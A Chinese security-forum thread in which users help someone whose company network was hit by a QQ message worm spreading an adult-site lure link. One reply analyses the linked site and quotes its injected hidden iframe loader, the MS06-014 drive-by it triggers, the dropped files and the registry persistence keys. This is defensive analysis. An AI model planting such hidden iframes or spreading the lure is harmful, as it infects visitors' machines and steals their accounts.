瑞星卡卡安全论坛

这病毒已经毒害了我们整个公司的网络
因为我在外面，
病毒内容为：
台湾成人影院.开业期间免费观看7天成人激情电影!网址 http://www.gogk.net/1047 特此发给群里的兄弟分享!望兄弟们不要到别的群宣传。 m=nkzd
有瑞星的就会提示如图....
请专家给个办法解决，

附件: 8529562007310130203.jpg

偶是新人，只能顶了，

这是不是就是传说中的QQ尾巴病毒吖?
QQ本身不是有查毒工具么?查一下试试行不?

我想知道这是木马还是病毒？

病毒
QQ医生下载
QQ网上有

瑞星能杀出来吗?

进入安全模式下,,清理C:\Documents and Settings\当前用户名\Local Settings\Temp 文件夹的文件.

先结束explorer.exe进程，然后重开，再下载金山文件粉碎器，把病毒文件删除，然后删除QQ整个目录，然后重装QQ。

什么病毒啊,要不你下个金山试试反正最近免费!网址是:http://www.duba.net/db2007/down.shtml

卡巴不错，试着用一下

http://www.gogk.net/1047
网站主页被挂马。
<iframe src=hxxp://www.sex58.net/qq.htm width=0 height=0></iframe>
qq.htm 是利用MS06014漏洞运行1988.exe木马。
1988.exe会释放文件C:\Program Files\Common Files\Microsoft Shared\MSINFO\9898CCE8.dll
C:\Program Files\Common Files\Microsoft Shared\MSINFO\9898CCE8.dat
添加注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
    <{8CCE9898-9898-CCE8-98CC-898CE898CCE8}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\9898CCE8.dll>
HKCR\CLSID\{8CCE9898-9898-CCE8-98CC-898CE898CCE8}\InProcServer32
  注册表值： （默认）
      类型: REG_SZ
      值： C:\Program Files\Common Files\Microsoft Shared\MSINFO\9898CCE8.dll

9898CCE8.dll 卡吧报Trojan-PSW.Win32.QQRob.ik
1988.exe 卡吧不报 卡吧病毒库：2007.3.9 17:32
1988.exe 在线杀毒情况：

附件: 7452132007310184837.jpg